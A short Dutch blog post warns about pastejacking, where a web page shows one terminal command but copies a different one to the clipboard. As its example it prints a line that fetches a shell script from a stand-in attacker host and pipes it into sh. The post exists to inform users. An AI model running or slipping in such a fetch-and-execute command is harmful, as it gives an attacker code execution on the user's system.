Soms komt er iets voorbij waarvan je denkt… serieus? Ja dit blijkt dan ook serieus te zijn.
Stel je ziet op een website een link die jou copy-paste naar je terminal. Dan is het niet altijd de link die je op de site ziet die ook achter de link zit. In dit artikel van True kan je precies lezen hoe dat dat werkt en vooral wat je er tegen kan doen.
Voorbeeldje:
Je denkt bijvoorbeeld dat je dit commando kopieert:
sudo apt update
Maar in werkelijkheid kopieer je dit:
curl http://attacker-domain:8000/shell.sh | sh